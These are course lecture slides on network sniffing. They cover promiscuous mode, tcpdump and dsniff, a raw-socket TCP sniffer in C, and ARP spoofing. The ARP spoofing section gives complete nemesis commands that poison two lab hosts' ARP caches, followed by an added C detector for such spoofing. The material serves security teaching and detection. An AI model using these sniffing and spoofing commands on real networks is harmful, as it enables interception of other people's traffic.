Nov 27, 2014
Sangwook Lee
COM850 Computer Hacking and Security
0x440 Network Sniffing
Table of Contents
• Network Sniffing
• Sniffing Tools
• ARP Spoofing
What is Network Sniffing?
The act of capturing packets that aren't necessarily meant for public viewing is called SNIFFING.
Two Sniffing Flows According to Network Type
• Non-switched network environment
  1. Set promiscuous mode
  2. Capture packets
• Switched network environment
  1. ARP spoofing
  2. Capture packets
Non-switched vs. Switched Network
• The flow of traffic in a non-switched network
  Step 1: Node A transmits a frame to Node C
  Step 2: The hub broadcasts this frame to every active port
  Step 3: Node B receives the frame and examines the address in the frame. After determining that it is not the intended host, it discards the frame
  Step 4: Node C receives the frame and examines the address in the frame. After determining that it is the intended host, it processes the frame further
  It should be noted that steps 3 and 4 can occur in either order
Non-switched vs. Switched Network
• The flow of traffic in a switched network
  Step 1: Node A transmits a frame to Node C
  Step 2: The switch examines this frame and determines the intended host. It then sets up a connection between Node A and Node C so that they have a 'private' connection
  Step 3: Node C receives the frame and examines the address. After determining that it is the intended host, it processes the frame further
Sniffing Non-switched Network
• For a host to be used as a sniffing agent, its NIC must be set to promiscuous mode
After promiscuous mode is set...
The NIC no longer drops network frames that are addressed to other hosts
Sniffing Non-switched Network
• Setting the promiscuous mode
$ sudo ifconfig eth0 promisc
Packet Capturing Tools
• Sniffers
  – tcpdump
  – dsniff
• Raw socket sniffers
  – raw_tcpsniff
  – pcap_sniff (with libpcap)
  – decode_sniff (with libpcap)
Sniffer: tcpdump
$ sudo tcpdump -X 'ip host <victim IP>'
Sniffer: dsniff
$ sudo dsniff -n
Raw Socket
• A raw socket is a network socket that allows direct sending and receiving of Internet Protocol packets without any protocol-specific transport-layer formatting
• A raw socket is created by specifying SOCK_RAW as the socket type
• There are multiple protocol options: IPPROTO_TCP, IPPROTO_UDP, IPPROTO_ICMP
Raw Socket Sniffer: raw_tcpsniff
raw_tcpsniff.c
$ gcc -o raw_tcpsniff raw_tcpsniff.c
$ sudo ./raw_tcpsniff
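As an added example (not the lecture's raw_tcpsniff.c), a raw-socket TCP sniffer of the kind compiled above: it opens SOCK_RAW with IPPROTO_TCP, so on Linux each recv() returns a full IPv4 datagram, which decode_tcp (a name chosen here, as is struct tcp_info) parses into addresses, ports, the TCP flag byte and payload length. Capturing needs root; the decoder itself works on any IPv4/TCP byte buffer.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <netinet/in.h>

struct tcp_info {                        /* what the sniffer prints per packet */
    char src_ip[INET_ADDRSTRLEN], dst_ip[INET_ADDRSTRLEN];
    uint16_t src_port, dst_port;
    uint8_t flags;                       /* TCP flag byte: 0x02 SYN, 0x10 ACK, ... */
    size_t payload_len;
};

/* Decode the IPv4 and TCP headers of one raw datagram (a constructed buffer
 * works too).  Returns 0 on success, -1 if the buffer is too short, not
 * IPv4, not TCP, or carries an inconsistent length field. */
int decode_tcp(const uint8_t *buf, size_t len, struct tcp_info *out)
{
    if (len < 20 || (buf[0] >> 4) != 4) return -1;
    size_t ihl = (buf[0] & 0x0f) * 4;                       /* IP header length */
    if (ihl < 20 || len < ihl + 20 || buf[9] != IPPROTO_TCP) return -1;
    const uint8_t *tcp = buf + ihl;
    size_t thl = (tcp[12] >> 4) * 4;                        /* TCP data offset */
    uint16_t tot = (uint16_t)(buf[2] << 8 | buf[3]);        /* IP total length */
    if (thl < 20 || tot < ihl + thl || tot > len) return -1;
    inet_ntop(AF_INET, buf + 12, out->src_ip, sizeof out->src_ip);
    inet_ntop(AF_INET, buf + 16, out->dst_ip, sizeof out->dst_ip);
    out->src_port = (uint16_t)(tcp[0] << 8 | tcp[1]);
    out->dst_port = (uint16_t)(tcp[2] << 8 | tcp[3]);
    out->flags = tcp[13];
    out->payload_len = tot - ihl - thl;
    return 0;
}

int main(void)
{
    int s = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);         /* needs root */
    if (s < 0) { perror("socket"); return 1; }
    uint8_t buf[65535]; struct tcp_info pi;
    for (;;) {
        ssize_t n = recv(s, buf, sizeof buf, 0);            /* one IP datagram */
        if (n < 0) { perror("recv"); break; }
        if (decode_tcp(buf, (size_t)n, &pi) == 0)
            printf("%s:%u -> %s:%u flags=0x%02x payload=%zu bytes\n", pi.src_ip,
                   pi.src_port, pi.dst_ip, pi.dst_port, pi.flags, pi.payload_len);
    }
    close(s); return 0;
}
```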
Raw Socket Sniffer with Libpcap: pcap_sniff
pcap_sniff.c
$ gcc -o pcap_sniff pcap_sniff.c -lpcap
$ sudo ./pcap_sniff
Raw Socket Sniffer with Libpcap: decode_sniff
decode_sniff.c
$ gcc -o decode_sniff decode_sniff.c -lpcap
$ sudo ./decode_sniff
Sniffing Switched Networks
• ARP spoofing
One of the basic operations of the Ethernet protocol revolves around ARP (Address Resolution Protocol) requests and replies. In general, when Node A wants to communicate with Node C on the network, it sends an ARP request. Node C will send an ARP reply which will include its MAC address. Even in a switched environment, this initial ARP request is sent in a broadcast manner. It is possible for Node B to craft and send an unsolicited, fake ARP reply to Node A. This fake ARP reply will specify that Node B has the MAC address of Node C. Node A will unwittingly send the traffic to Node B since it professes to have the intended MAC address.
Sniffing Switched Network
• ARP spoofing using NEMESIS (cont.)
  – Attacker: IP 1.1.1.20, MAC 00:00:00:BB:BB:BB
  – Victim1: IP 1.1.1.10, MAC 00:00:00:AA:AA:AA
  – Victim2: IP 1.1.1.30, MAC 00:00:00:CC:CC:CC
Sniffing Switched Network
• ARP spoofing using NEMESIS (cont.)
Attacker (System B) → Victim2 (System C):
$ sudo nemesis arp -v -r -d eth0 -S 1.1.1.10 -D 1.1.1.30 -h 00:00:00:BB:BB:BB -m 00:00:00:CC:CC:CC -H 00:00:00:BB:BB:BB -M 00:00:00:CC:CC:CC
Attacker (System B) → Victim1 (System A):
$ sudo nemesis arp -v -r -d eth0 -S 1.1.1.30 -D 1.1.1.10 -h 00:00:00:BB:BB:BB -m 00:00:00:AA:AA:AA -H 00:00:00:BB:BB:BB -M 00:00:00:AA:AA:AA
Sniffing Switched Network
• ARP spoofing using NEMESIS
ARP Cache of Victim1 (System A)
ARP Cache of Victim2 (System C)
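Added example (not from the lecture and not NEMESIS code): a minimal ARP monitor in C, in the spirit of arpwatch, that remembers the first MAC seen for each sender IP in ARP replies and flags a reply that rebinds a known IP to a different MAC, which is exactly what the two NEMESIS commands above make Victim1 and Victim2 see in their caches. build_arp_reply and check_arp_frame are names chosen here; the sample frames are constructed from the lab's addresses.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

static struct { uint8_t ip[4], mac[6]; } table[64];   /* IP -> first MAC seen */
static int n_entries;
/* Construct a 42-byte Ethernet+ARP reply (sender MAC/IP -> target MAC/IP).
 * Used only to build sample frames; a real monitor reads them from the wire. */
void build_arp_reply(uint8_t *f, const uint8_t *sha, const uint8_t *spa,
                     const uint8_t *tha, const uint8_t *tpa)
{
    memset(f, 0, 42);
    memcpy(f, tha, 6); memcpy(f + 6, sha, 6); f[12] = 0x08; f[13] = 0x06;
    uint8_t *a = f + 14;                /* htype 1, ptype IPv4, hlen 6, plen 4 */
    a[1] = 1; a[2] = 0x08; a[4] = 6; a[5] = 4; a[7] = 2;   /* opcode 2 = reply */
    memcpy(a + 8, sha, 6); memcpy(a + 14, spa, 4);
    memcpy(a + 18, tha, 6); memcpy(a + 24, tpa, 4);
}

/* Inspect one frame.  Returns 1 when an ARP reply rebinds an IP already in
 * the table to a different MAC (the fingerprint of ARP spoofing), else 0. */
int check_arp_frame(const uint8_t *f, size_t len)
{
    if (len < 42 || f[12] != 0x08 || f[13] != 0x06) return 0;     /* not ARP */
    const uint8_t *a = f + 14, *sha = a + 8, *spa = a + 14;
    if (a[2] != 0x08 || a[3] != 0 || a[4] != 6 || a[5] != 4) return 0;
    if (a[6] != 0 || a[7] != 2) return 0;                          /* replies only */
    for (int i = 0; i < n_entries; i++) {
        if (memcmp(table[i].ip, spa, 4) != 0) continue;
        if (memcmp(table[i].mac, sha, 6) == 0) return 0;           /* consistent */
        printf("ALERT: %u.%u.%u.%u rebound to a different MAC\n", spa[0], spa[1], spa[2], spa[3]);
        return 1;
    }
    if (n_entries < 64) {               /* first sighting: remember the binding */
        memcpy(table[n_entries].ip, spa, 4); memcpy(table[n_entries].mac, sha, 6);
        n_entries++; }
    return 0;
}

int main(void)
{   /* Replay the lab: C answers A honestly, then B claims C's IP, as NEMESIS does. */
    const uint8_t A_mac[6] = {0,0,0,0xAA,0xAA,0xAA}, A_ip[4] = {1,1,1,10};
    const uint8_t B_mac[6] = {0,0,0,0xBB,0xBB,0xBB};
    const uint8_t C_mac[6] = {0,0,0,0xCC,0xCC,0xCC}, C_ip[4] = {1,1,1,30};
    uint8_t f[42]; build_arp_reply(f, C_mac, C_ip, A_mac, A_ip);
    printf("legit reply flagged: %d\n", check_arp_frame(f, 42));
    build_arp_reply(f, B_mac, C_ip, A_mac, A_ip);
    printf("spoofed reply flagged: %d\n", check_arp_frame(f, 42));
    return 0;
}
```

A production monitor would also compare the ARP sender MAC with the Ethernet source MAC and expire old bindings, but the rebinding check alone catches the cache poisoning shown in the victims' ARP caches.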
The End